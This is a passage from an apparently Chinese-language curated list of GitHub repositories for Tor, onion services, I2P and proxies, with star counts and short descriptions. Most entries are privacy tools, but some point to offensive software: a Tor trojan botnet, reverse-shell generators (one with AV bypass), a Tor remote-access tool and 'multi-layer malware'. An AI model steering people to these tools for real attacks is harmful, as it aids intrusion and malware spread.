[auth0-samples/auth0-anonymous-tracker](https://github.com/auth0-samples/auth0-anonymous-tracker) A cross-site anonymous user tracker. - [**4**ๆ˜Ÿ][6m] [Go] [fentec-project/fe-anonymous-heatmap](https://github.com/fentec-project/fe-anonymous-heatmap) A demonstration of creating a location heatmap from encrypted data by using functional encryption. ### <a id="e99ba5f3de02f68412b13ca718a0afb6"></a>Tor&&&Onion&&ๆด‹่‘ฑ - [**3665**ๆ˜Ÿ][21d] [Py] [micahflee/onionshare](https://github.com/micahflee/onionshare) Securely and anonymously send and receive files, and publish onion sites - [**2375**ๆ˜Ÿ][18d] [security-onion-solutions/security-onion](https://github.com/security-onion-solutions/security-onion) Linux distro for intrusion detection, enterprise security monitoring, and log management - [**1731**ๆ˜Ÿ][3y] [Go] [s-rah/onionscan](https://github.com/s-rah/onionscan) OnionScan is a free and open source tool for investigating the Dark Web. - [**1211**ๆ˜Ÿ][t] [ObjC] [onionbrowser/onionbrowser](https://github.com/onionbrowser/onionbrowser) An open-source, privacy-enhancing web browser for iOS, utilizing the Tor anonymity network - ้‡ๅคๅŒบๆฎต: [iOS->ๅทฅๅ…ท](#692d86299dedab073fbb6144a5b2bd64) | - [**930**ๆ˜Ÿ][9m] [C#] [lachesis/scallion](https://github.com/lachesis/scallion) ๅŸบไบŽGPU็š„Onion Hash็”Ÿๆˆๅ™จ - [**761**ๆ˜Ÿ][7y] [grugq/portal](https://github.com/grugq/portal) Personal Onion Router To Assure Liberty - [**560**ๆ˜Ÿ][7y] [C] [katmagic/shallot](https://github.com/katmagic/shallot) ไธบๆ‚จ็š„้š่—ๆœๅŠกๅˆ›ๅปบ่‡ชๅฎšไน‰็š„.onionๅœฐๅ€ - [**492**ๆ˜Ÿ][1m] [Shell] [trimstray/multitor](https://github.com/trimstray/multitor) Shell่„šๆœฌ, ๅˆ›ๅปบๅคšไธชTorๅฎžไพ‹, ๅนถไฝฟ็”จHAProxyๅฎž็Žฐ่ดŸ่ฝฝๅ‡่กก - ้‡ๅคๅŒบๆฎต: [ไปฃ็†->ๅทฅๅ…ท->HAProxy](#d3069cac6097830d12f5933c9c8b7a77) | - [**436**ๆ˜Ÿ][11d] [JS] [ayms/node-tor](https://github.com/ayms/node-tor) Javascript implementation of the Tor (or Tor like) anonymizer project (The Onion Router) - [**424**ๆ˜Ÿ][3m] [Py] [nullhypothesis/exitmap](https://github.com/nullhypothesis/exitmap) A fast and modular scanner for Tor exit relays. - [**423**ๆ˜Ÿ][3d] [Awk] [alecmuffett/eotk](https://github.com/alecmuffett/eotk) Enterprise Onion Toolkit - [**419**ๆ˜Ÿ][1y] [Go] [kragniz/tor-controller](https://github.com/kragniz/tor-controller) Run Tor onion services on Kubernetes - [**416**ๆ˜Ÿ][13d] [C] [deeponion/deeponion-legacy](https://github.com/deeponion/deeponion-legacy) Official Source Repo for DeepOnion - Anonymous Cryptocurrency on TOR Network (legacy) - [**385**ๆ˜Ÿ][20d] [Py] [maqp/tfc](https://github.com/maqp/tfc) Tinfoil Chat - Onion-routed, endpoint secure messaging system - [**379**ๆ˜Ÿ][9m] [Py] [k4m4/onioff](https://github.com/k4m4/onioff) urlๆฃ€ๆต‹ๅ™จ๏ผŒๆทฑๅบฆๆฃ€ๆต‹็ฝ‘้กต้“พๆŽฅ - [**370**ๆ˜Ÿ][4d] [Py] [realgam3/pymultitor](https://github.com/realgam3/pymultitor) pymultitor๏ผšPython ๅคš็บฟ็จ‹ Tor ่„šๆœฌ - [**369**ๆ˜Ÿ][2m] [Py] [micahflee/torbrowser-launcher](https://github.com/micahflee/torbrowser-launcher) Securely and easily download, verify, install, and launch Tor Browser in Linux - [**354**ๆ˜Ÿ][4d] [Py] [alecmuffett/real-world-onion-sites](https://github.com/alecmuffett/real-world-onion-sites) This is a list of substantial, commercial-or-social-good mainstream websites which provide onion services. - [**316**ๆ˜Ÿ][2m] [Shell] [brainfucksec/kalitorify](https://github.com/brainfucksec/kalitorify) ็”จไบŽKali็š„shell่„šๆœฌ๏ผŒไฝฟ็”จiptablesๅˆ›ๅปบ้€š่ฟ‡Tor็ฝ‘็ปœ็š„้€ๆ˜Žไปฃ็†ใ€‚ๅฏไปฅๆ‰ง่กŒๅ„็งๆฃ€ๆŸฅ๏ผšๆฃ€ๆŸฅTorๅ‡บๅฃ่Š‚็‚น๏ผˆๅณๅœจTorไปฃ็†ไธ‹ๆ—ถ็š„ๅ…ฌๅ…ฑIP๏ผ‰๏ผŒๆˆ–่€…Torๅทฒๆญฃ็กฎ้…็ฝฎ๏ผŒๅฏไปฅๆฃ€ๆŸฅๆœๅŠกๅ’Œ็ฝ‘็ปœ่ฎพ็ฝฎใ€‚ - [**313**ๆ˜Ÿ][2y] [Shell] [milesrichardson/docker-onion-nmap](https://github.com/milesrichardson/docker-onion-nmap) ไฝฟ็”จ nmap ๆ‰ซๆ Tor ้š่—็ฝ‘็ปœ็š„Docker ้•œๅƒใ€‚ๅŸบไบŽ alpine๏ผŒไฝฟ็”จproxychains ๅš nmap ็š„ๅŒ…่ฃ… - [**280**ๆ˜Ÿ][6m] [Py] [mthbernardes/rsg](https://github.com/mthbernardes/rsg) ๅคš็งๆ–นๅผ็”Ÿๆˆๅๅ‘Shell - [**279**ๆ˜Ÿ][2y] [Py] [dirtyfilthy/freshonions-torscraper](https://github.com/dirtyfilthy/freshonions-torscraper) Fresh Onions is an open source TOR spider / hidden service onion crawler hosted at zlal32teyptf4tvi.onion - [**268**ๆ˜Ÿ][10m] [C++] [wbenny/mini-tor](https://github.com/wbenny/mini-tor) ไฝฟ็”จ MSCNG/CryptoAPI ๅฎž็Žฐ็š„ Tor ๅ่ฎฎ - [**265**ๆ˜Ÿ][9d] [Go] [lightningnetwork/lightning-onion](https://github.com/lightningnetwork/lightning-onion) Onion Routed Micropayments for the Lightning Network - [**262**ๆ˜Ÿ][2m] [C] [basil00/torwall](https://github.com/basil00/torwall) Tallow - Transparent Tor for Windows - [**254**ๆ˜Ÿ][3y] [Haskell] [galoisinc/haskell-tor](https://github.com/galoisinc/haskell-tor) A Haskell implementation of the Tor protocol. - [**251**ๆ˜Ÿ][4y] [Py] [whitepacket/zib-trojan](https://github.com/whitepacket/zib-trojan) The Open Tor Botnet (ZIB); Python-based forever-FUD IRC Trojan - [**245**ๆ˜Ÿ][3y] [Py] [donnchac/onionbalance](https://github.com/donnchac/onionbalance) OnionBalance provides load-balancing and redundancy for Tor hidden services - [**235**ๆ˜Ÿ][2d] [C] [ipsn/go-libtor](https://github.com/ipsn/go-libtor) Self-contained Tor from Go - [**223**ๆ˜Ÿ][6m] [Py] [ruped24/toriptables2](https://github.com/ruped24/toriptables2) Tor Iptables script is an anonymizer that sets up iptables and tor to route all services and traffic including DNS through the Tor network. - [**220**ๆ˜Ÿ][2y] [Py] [vlall/darksearch](https://github.com/vlall/darksearch) query cached onion sites, irc chatrooms, various pdfs, game chats, blackhat forums etc - [**197**ๆ˜Ÿ][3m] [Py] [meejah/txtorcon](https://github.com/meejah/txtorcon) Twisted-based asynchronous Tor control protocol implementation. Includes unit-tests, examples, state-tracking code and configuration abstraction. - [**196**ๆ˜Ÿ][1m] [C] [cathugger/mkp224o](https://github.com/cathugger/mkp224o) vanity address generator for tor onion v3 (ed25519) hidden services - [**161**ๆ˜Ÿ][3y] [Shell] [hiroshimanrise/anonym8](https://github.com/hiroshimanrise/anonym8) Sets Transparent proxy tunnel through Tor, I2P, Privoxy, Polipo and modify DNS; Include Anonymizing Relay Monitor (arm), macchanger and wipe (Cleans ram/cache & swap-space) features, ID spoofing has never been so easy. - [**147**ๆ˜Ÿ][2y] [C] [r-a-w/torproxy](https://github.com/r-a-w/torproxy) TorProxy is a tool which uses netfilter hooks in the linux kernel to route all network traffic through the Tor network - [**141**ๆ˜Ÿ][2y] [Py] [gumblex/ptproxy](https://github.com/gumblex/ptproxy) Turn any pluggable transport for Tor into an obfuscating TCP tunnel. - [**140**ๆ˜Ÿ][27d] [Py] [blueudp/deep-explorer](https://github.com/blueudp/deep-explorer) Deep Explorer is a tool developed in python which purpose is the search of hidden services in tor network, using Ahmia Browser and crawling the links obtained - [**131**ๆ˜Ÿ][2y] [Shell] [coldhakca/tor-relay-bootstrap](https://github.com/coldhakca/tor-relay-bootstrap) Script to bootstrap a Debian server to be a set-and-forget Tor relay - [**130**ๆ˜Ÿ][1y] [Py] [blacknbunny/mcreator](https://github.com/blacknbunny/mcreator) ๅๅ‘Shell็”Ÿๆˆๅ™จ, ่‡ชๅธฆAV็ป•่ฟ‡ๆŠ€ๆœฏ - [**122**ๆ˜Ÿ][2y] [Ruby] [ehloonion/onionmx](https://github.com/ehloonion/onionmx) Onion delivery, so delicious - [**119**ๆ˜Ÿ][2y] [alecmuffett/the-onion-diaries](https://github.com/alecmuffett/the-onion-diaries) Blog-type notes about building Onion sites - [**119**ๆ˜Ÿ][28d] [C#] [joelverhagen/torsharp](https://github.com/joelverhagen/torsharp) Use Tor for your C# HTTP clients. Tor + Privoxy = - [**114**ๆ˜Ÿ][12m] [C] [opsxcq/docker-tor-hiddenservice-nginx](https://github.com/opsxcq/docker-tor-hiddenservice-nginx) Easily setup a hidden service inside the Tor network - [**114**ๆ˜Ÿ][8y] [C++] [moxie0/tortunnel](https://github.com/moxie0/tortunnel) A partial Onion Proxy implementation that's designed to build single-hop circuits through Tor exit nodes - [**109**ๆ˜Ÿ][1m] [Py] [t0thkr1s/revshellgen](https://github.com/t0thkr1s/revshellgen) Reverse shell generator written in Python 3. - [**107**ๆ˜Ÿ][2m] [ajvb/awesome-tor](https://github.com/ajvb/awesome-tor) A list of awesome Tor related projects, articles, papers, etc - [**104**ๆ˜Ÿ][3m] [Ruby] [dryruby/tor.rb](https://github.com/dryruby/tor.rb) Tor.rb is a Ruby library for interacting with the Tor anonymity network. - [**102**ๆ˜Ÿ][7m] [HTML] [ahmia/search](https://github.com/ahmia/search) Ahmia - Search Engine for onion services. - [**95**ๆ˜Ÿ][11m] [Shell] [antitree/private-tor-network](https://github.com/antitree/private-tor-network) Run an isolated instance of a tor network in Docker containers - [**95**ๆ˜Ÿ][2y] [guardianproject/tor-browser](https://github.com/guardianproject/tor-browser) UPDATE: Orfox is being replaced by Tor Browser for Android. All future work and comments will be handled by Tor Project. - ้‡ๅคๅŒบๆฎต: [Android->ๅทฅๅ…ท](#863839860fab4b8601905205cac9b54f) | - [**94**ๆ˜Ÿ][22d] [Go] [lu4p/torat](https://github.com/lu4p/torat) ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication - [**88**ๆ˜Ÿ][9m] [Shell] [jseidl/multi-tor](https://github.com/jseidl/multi-tor) Shellscript opens multiple TOR instances - [**80**ๆ˜Ÿ][2m] [JS] [garethflowers/tor-browser-portable](https://github.com/garethflowers/tor-browser-portable) Portable version of the Tor Browser, for Windows - [**79**ๆ˜Ÿ][11m] [Makefile] [onioniot/openwrt-packages](https://github.com/onioniot/openwrt-packages) Onion Packages Feed for OpenWRT - [**79**ๆ˜Ÿ][3y] [C++] [torps/torps](https://github.com/torps/torps) The Tor Path Simulator - [**78**ๆ˜Ÿ][6y] [Shell] [breadtk/onion_pi](https://github.com/breadtk/onion_pi) Make a Raspberry Pi into a Anonymizing Tor Proxy! - [**78**ๆ˜Ÿ][3y] [Go] [cyphar/mkonion](https://github.com/cyphar/mkonion) A simple way to create a Tor onion service for existing Docker containers. - [**76**ๆ˜Ÿ][4y] [PHP] [dunglas/php-torcontrol](https://github.com/dunglas/php-torcontrol) PHP TorControl, a library to control TOR - [**76**ๆ˜Ÿ][3m] [Shell] [edu4rdshl/tor-router](https://github.com/edu4rdshl/tor-router) A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code. - [**74**ๆ˜Ÿ][4y] [Go] [dlion/guesstor](https://github.com/dlion/guesstor) Bruteforces [.onion] domains - [**74**ๆ˜Ÿ][20d] [JS] [ralphwetzel/theonionbox](https://github.com/ralphwetzel/theonionbox) Dashboard to monitor Tor node operations - [**72**ๆ˜Ÿ][4y] [david415/ansible-tor](https://github.com/david415/ansible-tor) An Ansible role for using tor! - [**68**ๆ˜Ÿ][8d] [Shell] [brainfucksec/archtorify](https://github.com/brainfucksec/archtorify) Transparent proxy through Tor for Arch Linux OS - [**66**ๆ˜Ÿ][2m] [Java] [lmax-exchange/disruptor-proxy](https://github.com/LMAX-Exchange/disruptor-proxy) Byte-code generator to create Disruptor-backed proxies - [**64**ๆ˜Ÿ][7m] [ObjC] [javerous/torchat-mac](https://github.com/javerous/torchat-mac) macOS native TorChat client - [**60**ๆ˜Ÿ][5y] [Go] [jgrahamc/torhoney](https://github.com/jgrahamc/torhoney) Gets the list of TOR exit nodes and matches them with Project Honeypot data - [**60**ๆ˜Ÿ][8m] [Py] [viele/onionskinrenderer](https://github.com/viele/onionskinrenderer) This is an Onion Skin Renderer for Autodesk Maya - [**57**ๆ˜Ÿ][9m] [Go] [openbazaar/go-onion-transport](https://github.com/openbazaar/go-onion-transport) Tor onion transport for IPFS - [**57**ๆ˜Ÿ][3m] [Py] [gosecure/freshonions-torscraper](https://github.com/gosecure/freshonions-torscraper) Fresh Onions is an open source TOR spider / hidden service onion crawler - [**54**ๆ˜Ÿ][2y] [Java] [mirsamantajbakhsh/onionharvester](https://github.com/mirsamantajbakhsh/onionharvester) A small TOR Onion Address harvester for checking if the address is available or not. - [**53**ๆ˜Ÿ][2y] [Go] [cmars/ormesh](https://github.com/cmars/ormesh) onion-routed mesh - [**53**ๆ˜Ÿ][2y] [Py] [inurlx/cloudkill3r](https://github.com/inurlx/cloudkill3r) CLOUDKiLL3R bypasses Cloudflare protection service via TOR Browser using crimeflare ! - [**50**ๆ˜Ÿ][4y] [C++] [sri-csl/stegotorus](https://github.com/sri-csl/stegotorus) A Camouflage Proxy for the Tor Anonymity System - [**50**ๆ˜Ÿ][1y] [JS] [lukechilds/onionite](https://github.com/lukechilds/onionite) Explore the Tor network - [**49**ๆ˜Ÿ][13d] [C] [rahra/onioncat](https://github.com/rahra/onioncat) Official repository of OnionCat, the VPN adapter for Tor and I2P. - [**46**ๆ˜Ÿ][6d] [Shell] [security-onion-solutions/securityonion-saltstack](https://github.com/security-onion-solutions/securityonion-saltstack) - [**44**ๆ˜Ÿ][6d] [JS] [loki-project/loki-messenger](https://github.com/loki-project/loki-messenger) Loki Messenger - Onion routing based messenger - [**43**ๆ˜Ÿ][10m] [PHP] [danwin/onion-link-list](https://github.com/danwin/onion-link-list) A set of scripts to list tor hidden services - [**43**ๆ˜Ÿ][6m] [Shell] [infosecn1nja/ycsm](https://github.com/infosecn1nja/ycsm) This is a quick script installation for resilient redirector using nginx reverse proxy and letsencrypt compatible with some popular Post-Ex Tools (Cobalt Strike, Empire, Metasploit, PoshC2). - [**43**ๆ˜Ÿ][2y] [Py] [mthbernardes/ipchecker](https://github.com/mthbernardes/ipchecker) Check if a IP is from tor or is a malicious proxy - [**38**ๆ˜Ÿ][2y] [Java] [adrianbzg/twitter-follow-exploit](https://github.com/adrianbzg/twitter-follow-exploit) Automated Twitter mass account creation and follow using Selenium and Tor VPN - [**38**ๆ˜Ÿ][5y] [Shell] [jivoi/ansible-pentest-with-tor](https://github.com/jivoi/ansible-pentest-with-tor) Use Tor for anonymous scanning with nmap - [**37**ๆ˜Ÿ][1m] [Shell] [security-onion-solutions/securityonion-elastic](https://github.com/security-onion-solutions/securityonion-elastic) Security Onion Elastic Stack - [**36**ๆ˜Ÿ][4y] [Java] [onionmail/onionmail](https://github.com/onionmail/onionmail) TOR Mail encrypted server for Hidden Services - [**36**ๆ˜Ÿ][2m] [Shell] [itshaadi/torbox](https://github.com/itshaadi/torbox) Container-based Tor access point (Anonymizing Middlebox). - [**35**ๆ˜Ÿ][5y] [Py] [miserlou/onionchat](https://github.com/miserlou/onionchat) Anonymous chat. No Javascript. - [**32**ๆ˜Ÿ][5m] [Py] [mikemeliz/torcrawl.py](https://github.com/mikemeliz/torcrawl.py) Crawl and extract (regular or onion) webpages through TOR network - [**31**ๆ˜Ÿ][2y] [KiCad Layout] [5n44p/omega-dock-new](https://github.com/5n44p/omega-dock-new) A dock for Onion omega, omega2 and omega2+. It features: Microusb for power supply, USB host, Ethernet - [**31**ๆ˜Ÿ][5y] [Py] [glamrock/stormy](https://github.com/glamrock/stormy) Easy creation of Tor Hidden Services - [**31**ๆ˜Ÿ][5y] [Shell] [patrickod/docker-tor-hidden-services](https://github.com/patrickod/docker-tor-hidden-services) A simple way of exposing any docker container as a tor hidden service - [**30**ๆ˜Ÿ][1m] [Shell] [security-onion-solutions/securityonion-setup](https://github.com/security-onion-solutions/securityonion-setup) - [**29**ๆ˜Ÿ][4y] [Makefile] [radicallyopensecurity/netaidkit](https://github.com/radicallyopensecurity/netaidkit) Standalone VPN/Tor WiFi router for journalists and activists - ้‡ๅคๅŒบๆฎต: [VPN->ๅทฅๅ…ท](#d62a971d37c69db9f3b9187318c3921a) | - [**28**ๆ˜Ÿ][3y] [Py] [baltimorechad/pyonionscan](https://github.com/baltimorechad/pyonionscan) Dark Web OSINT With Python and OnionScan - [**28**ๆ˜Ÿ][5y] [C++] [yawning/obfsclient](https://github.com/yawning/obfsclient) A C++11 obfs2/3 Tor managed pluggable transport client - [**27**ๆ˜Ÿ][3y] [Py] [duk3luk3/onion-py](https://github.com/duk3luk3/onion-py) Python wrapper for the OnionOO tor status API - [**27**ๆ˜Ÿ][9m] [Go] [nullhypothesis/sybilhunter](https://github.com/nullhypothesis/sybilhunter) Hunting for Sybils and anomalies in archived Tor network data. - [**27**ๆ˜Ÿ][1m] [Shell] [security-onion-solutions/securityonion-docker](https://github.com/security-onion-solutions/securityonion-docker) Docker files for Security Onion - [**25**ๆ˜Ÿ][2y] [Py] [absingh31/tor_spider](https://github.com/absingh31/tor_spider) Python project to crawl and scrap the lesser known deep web or one can say dark web. Just provide the onion link and get started. - [**24**ๆ˜Ÿ][6m] [Py] [bunseokbot/darklight](https://github.com/bunseokbot/darklight) Engine for collecting onion domains and crawling from webpage based on Tor network - [**24**ๆ˜Ÿ][7m] [ObjC] [mtigas/onionbrowser](https://github.com/mtigas/onionbrowser) personal fork for testing and submitting diffs for review. you DEFINITELY want the OnionBrowser/OnionBrowser repo instead - [**24**ๆ˜Ÿ][2y] [Shell] [oniondecoy/installer](https://github.com/oniondecoy/installer) A platform to run private unannounced Honeypots as Tor Hidden Services (aka Onion Decoys) inside the Tor Network. - [**23**ๆ˜Ÿ][] [C++] [deeponion/deeponion](https://github.com/deeponion/deeponion) Official Source Repo for DeepOnion - Anonymous Cryptocurrency on TOR - [**22**ๆ˜Ÿ][5m] [Java] [guardianproject/jtorctl](https://github.com/guardianproject/jtorctl) deprecated fork of Java Tor Control Library - [**22**ๆ˜Ÿ][4y] [Go] [jgrahamc/torexit](https://github.com/jgrahamc/torexit) Small program to read lists of Tor exit nodes and draw picture showing when they join/leave list - [**22**ๆ˜Ÿ][2y] [Py] [mdegrazia/onionpeeler](https://github.com/mdegrazia/onionpeeler) Python script to batch query the Tor Relays and Bridges - [**21**ๆ˜Ÿ][3y] [Go] [rdkr/oniongen-go](https://github.com/rdkr/oniongen-go) - [**21**ๆ˜Ÿ][3y] [Go] [shakenetwork/onionscan](https://github.com/shakenetwork/onionscan) OnionScanๆš—็ฝ‘็ˆฌ่™ซๆ˜ฏไธ€ไธชๅ…่ดน็š„ๅผ€ๆบๅทฅๅ…ท๏ผŒ็”จไบŽ่ฐƒๆŸฅ้ป‘็ฝ‘ใ€‚ OnionScan is a free and open source tool for investigating the Dark Web - [**20**ๆ˜Ÿ][11m] [Go] [nogoegst/onionize](https://github.com/nogoegst/onionize) create an onion site from a directory, file, zip or an HTTP(S) site - [**20**ๆ˜Ÿ][5d] [Py] [beardog108/onionr](https://github.com/beardog108/onionr) Private Decentralized Communication Network - [**19**ๆ˜Ÿ][4m] [Go] [mahrud/caddy-altonions](https://github.com/mahrud/caddy-altonions) Opportunistic Onions plugin for Caddy - [**18**ๆ˜Ÿ][11m] [Go] [ciehanski/onionbox](https://github.com/ciehanski/onionbox) Send and receive files securely through Tor. - [**18**ๆ˜Ÿ][3y] [PS] [defensivedepth/pertinax](https://github.com/defensivedepth/pertinax) Integrating Sysinternals Autorunsโ€™ logs into Security Onion - [**18**ๆ˜Ÿ][2y] [Lua] [nickcalyx/xmpp-onion-map](https://github.com/nickcalyx/xmpp-onion-map) A list of XMPP servers available as hidden services for use with the Prosody server and mod_onions - [**18**ๆ˜Ÿ][2y] [Shell] [norpol/opensshd-tor-easy-setup](https://github.com/norpol/opensshd-tor-easy-setup) WIP: Quick and easy way to setup a tor .onion ssh service - [**17**ๆ˜Ÿ][3y] [HTML] [jonathan-reisdorf/node-onion-omega-oled-text](https://github.com/jonathan-reisdorf/node-onion-omega-oled-text) Write text with big 16x16 font on the OLED expansion of the Onion Omega / Omega2 - [**15**ๆ˜Ÿ][3y] [Shell] [ahmia/torbalancer](https://github.com/ahmia/torbalancer) TorBalancer is a load balancer that uses multiple Tor clients and reuses circuits to onion sites. - [**15**ๆ˜Ÿ][2m] [CSS] [dragonfruitnetwork/onionfruit](https://github.com/dragonfruitnetwork/onionfruit) OnionFruit Connect Downloads and Landing Pages - [**14**ๆ˜Ÿ][4y] [Shell] [juhanurmi/stealth-ssh](https://github.com/juhanurmi/stealth-ssh) Secure SSH server using onion service. - [**14**ๆ˜Ÿ][2m] [Shell] [security-onion-solutions/securityonion-nsmnow-admin-scripts](https://github.com/security-onion-solutions/securityonion-nsmnow-admin-scripts) - [**13**ๆ˜Ÿ][2y] [Py] [loomisloud/onion-crawler](https://github.com/loomisloud/onion-crawler) Tor website crawler (specific for Alphabay at the time) - [**12**ๆ˜Ÿ][3y] [Java] [miguelmarco/zcashpannel](https://github.com/miguelmarco/zcashpannel) An android front-end to the zcash wallet through onion services - [**11**ๆ˜Ÿ][1m] [JS] [shesek/onionfile](https://github.com/shesek/onionfile) Simple file sharing over tor hidden services (v3) - [**11**ๆ˜Ÿ][2y] [JS] [lukechilds/onionoo-node-client](https://github.com/lukechilds/onionoo-node-client) Node.js client library for the Tor Onionoo API - [**9**ๆ˜Ÿ][4y] [Go] [onionscan/onionscan](https://github.com/onionscan/onionscan) Scan Onion Services for Security Issues - [**8**ๆ˜Ÿ][5m] [PHP] [security-onion-solutions/securityonion-capme](https://github.com/security-onion-solutions/securityonion-capme) - [**8**ๆ˜Ÿ][2y] [C++] [gilmansharov/onionmalware](https://github.com/gilmansharov/onionmalware) Multi-layer malware - [**7**ๆ˜Ÿ][2y] [Shell] [security-onion-solutions/securityonion-elsa-extras](https://github.com/security-onion-solutions/securityonion-elsa-extras) - [**7**ๆ˜Ÿ][16d] [Shell] [security-onion-solutions/securityonion-sostat](https://github.com/security-onion-solutions/securityonion-sostat) - [**6**ๆ˜Ÿ][6y] [Perl] [wwwiretap/bleeding_onions](https://github.com/wwwiretap/bleeding_onions) Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160 - [**5**ๆ˜Ÿ][26d] [HTML] [security-onion-solutions/securityonion-web-page](https://github.com/security-onion-solutions/securityonion-web-page) - [**4**ๆ˜Ÿ][1y] [Shell] [ecrimelabs/securityonion-ecrimelabs](https://github.com/ecrimelabs/securityonion-ecrimelabs) Implementation of informaiton from MISP through the eCrimeLabs API and into SecurityOnion - [**4**ๆ˜Ÿ][7m] [Py] [irl/bushel](https://github.com/irl/bushel) A bushel of onions is 57 lbs - [**4**ๆ˜Ÿ][9m] [Shell] [mutedmouse/helk4so](https://github.com/mutedmouse/helk4so) This repository is for integrating HELK capabilities into Security Onion instances. This will be an evolving extension to both products and as such this not contributed directly to either the HELK or SecurityOnion. Please both use at your own risk and enjoy. - [**4**ๆ˜Ÿ][3y] [Shell] [security-onion-solutions/securityonion-sguil-db-purge](https://github.com/security-onion-solutions/securityonion-sguil-db-purge) - [**4**ๆ˜Ÿ][2y] [Py] [whonix/control-port-filter-python](https://github.com/whonix/control-port-filter-python) [Deprecated in Whonix 14] - new project name -> https://github.com/Whonix/onion-grater - [**2**ๆ˜Ÿ][3y] [C] [epidemics-scepticism/all-the-onions](https://github.com/epidemics-scepticism/all-the-onions) Cryptographers hate him! Find every Tor hidden service address with this one weird trick! - [**2**ๆ˜Ÿ][2y] [Py] [mirsamantajbakhsh/onionharvester-server](https://github.com/mirsamantajbakhsh/onionharvester-server) The web application for paralleling and distributing search operations among Onion Harvester clients. - [**1**ๆ˜Ÿ][2y] [Py] [meejah/txtorcon-documentation-builder](https://github.com/meejah/txtorcon-documentation-builder) A distributed application that re-builds txtorcon's onion-service hosted documentation - [**0**ๆ˜Ÿ][2y] [TeX] [alexxnica/onion-service-usability](https://github.com/alexxnica/onion-service-usability) Research project about understanding how Tor users interact with onion services ### <a id="ceb532aae106b39ea224c7aef786c831"></a>I2P - [**1340**ๆ˜Ÿ][3d] [C++] [purplei2p/i2pd](https://github.com/purplei2p/i2pd) a full-featured C++ implementation of I2P client - [**548**ๆ˜Ÿ][1y] [C++] [monero-project/kovri](https://github.com/monero-project/kovri) kovri๏ผšI2P ๅŒฟๅ็ฝ‘็ปœ็š„ C++ ๅฎž็Žฐ็‰ˆ - [**80**ๆ˜Ÿ][7m] [Java] [i2p/i2p.i2p-bote](https://github.com/i2p/i2p.i2p-bote) I2P-Bote is a serverless, encrypted e-mail application. - [**71**ๆ˜Ÿ][19d] [Java] [i2p/i2p.android.base](https://github.com/i2p/i2p.android.base) I2P for Android - [**71**ๆ˜Ÿ][2m] [JS] [purplei2p/i2pdbrowser](https://github.com/purplei2p/i2pdbrowser) i2pd browser bundle - [**55**ๆ˜Ÿ][6d] [Rust] [str4d/ire](https://github.com/str4d/ire) I2P router implementation in Rust - [**42**ๆ˜Ÿ][2m] [mikalv/awesome-i2p](https://github.com/mikalv/awesome-i2p) A curated list of awesome I2P implementations, libraries, resources, projects, and shiny things. I2P is an anonymous overlay network - a network within a network. It is intended to protect communication from dragnet surveillance and monitoring by third parties such as ISPs. - [**28**ๆ˜Ÿ][2y] [C] [l-n-s/transmission-i2p](https://github.com/l-n-s/transmission-i2p) Anonymous torrent client Transmission-I2P [UNMAINTAINED] - [**28**ๆ˜Ÿ][5m] [JS] [purplei2p/i2pd-tools](https://github.com/purplei2p/i2pd-tools) Some useful tools for I2P - [**20**ๆ˜Ÿ][1m] [C++] [nonlinear-chaos-order-etc/i2pchat](https://github.com/nonlinear-chaos-order-etc/i2pchat) - [**12**ๆ˜Ÿ][2m] [Py] [str4d/txi2p](https://github.com/str4d/txi2p) I2P bindings for Twisted. *** ## <a id="7b28248ff4b6fe73675e3139109ef93d"></a>ๆ–‡็ซ  # <a id="21cbd08576a3ead42f60963cdbfb8599"></a>ไปฃ็†&&Proxy *** ## <a id="d03d494700077f6a65092985c06bf8e8"></a>ๅทฅๅ…ท ### <a id="0ff94312f3ab4898f5996725133ea9d1"></a>ๆœชๅˆ†็ฑป - [**7589**ๆ˜Ÿ][20d] [Go] [snail007/goproxy](https://github.com/snail007/goproxy) Proxyๆ˜ฏ้ซ˜ๆ€ง่ƒฝๅ…จๅŠŸ่ƒฝ็š„httpไปฃ็†ใ€httpsไปฃ็†ใ€socks5ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ใ€ๅ†…็ฝ‘็ฉฟ้€p2pใ€ๅ†…็ฝ‘็ฉฟ้€ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๅๅ‘ไปฃ็†ใ€ๅ†…็ฝ‘็ฉฟ้€ๆœๅŠกๅ™จใ€Websocketไปฃ็†ใ€TCPไปฃ็†ใ€UDPไปฃ็†ใ€DNSไปฃ็†ใ€DNSๅŠ ๅฏ†ไปฃ็†๏ผŒไปฃ็†API่ฎค่ฏ๏ผŒๅ…จ่ƒฝ่ทจๅนณๅฐไปฃ็†ๆœๅŠกๅ™จใ€‚ - [**4145**ๆ˜Ÿ][5m] [Py] [spiderclub/haipproxy](https://github.com/spiderclub/haipproxy) - [**2457**ๆ˜Ÿ][2d] [C#] [netchx/netch](https://github.com/netchx/netch) ๆธธๆˆๅŠ ้€Ÿๅ™จใ€‚ๆ”ฏๆŒ:Socks5, Shadowsocks, ShadowsocksR, V2Ray ๅ่ฎฎ - [**2262**ๆ˜Ÿ][3m] [Py] [novnc/websockify](https://github.com/novnc/websockify) Websockify is a WebSocket to TCP proxy/bridge. This allows a browser to connect to any application/server/service. Implementations in Python, C, Node.js and Ruby. - [**2153**ๆ˜Ÿ][6y] [Ruby] [plamoni/siriproxy](https://github.com/plamoni/siriproxy) A (tampering) proxy server for Apple's Siri - [**1613**ๆ˜Ÿ][7m] [Go] [sipt/shuttle](https://github.com/sipt/shuttle) A web proxy in Golang with amazing features. - [**1423**ๆ˜Ÿ][18d] [C] [z3apa3a/3proxy](https://github.com/z3apa3a/3proxy) ๅพฎๅž‹ๅ…่ดนไปฃ็†ๆœๅŠกๅ™จ - [**1243**ๆ˜Ÿ][2m] [Go] [google/martian](https://github.com/google/martian) ็”จไบŽๆž„ๅปบ่‡ชๅฎšไน‰HTTP / Sไปฃ็†็š„ๅบ“ - [**1073**ๆ˜Ÿ][6m] [C] [tcurdt/iproxy](https://github.com/tcurdt/iproxy) Let's you connect your laptop to the iPhone to surf the web. - [**910**ๆ˜Ÿ][7d] [JS] [mellow-io/mellow](https://github.com/mellow-io/mellow) Mellow is a rule-based global transparent proxy client for Windows, macOS and Linux. - [**777**ๆ˜Ÿ][3y] [TS] [uwnetworkslab/uproxy-p2p](https://github.com/uwnetworkslab/uproxy-p2p) Internet without borders - [**739**ๆ˜Ÿ][4d] [Py] [abhinavsingh/proxy.py](https://github.com/abhinavsingh/proxy.py) 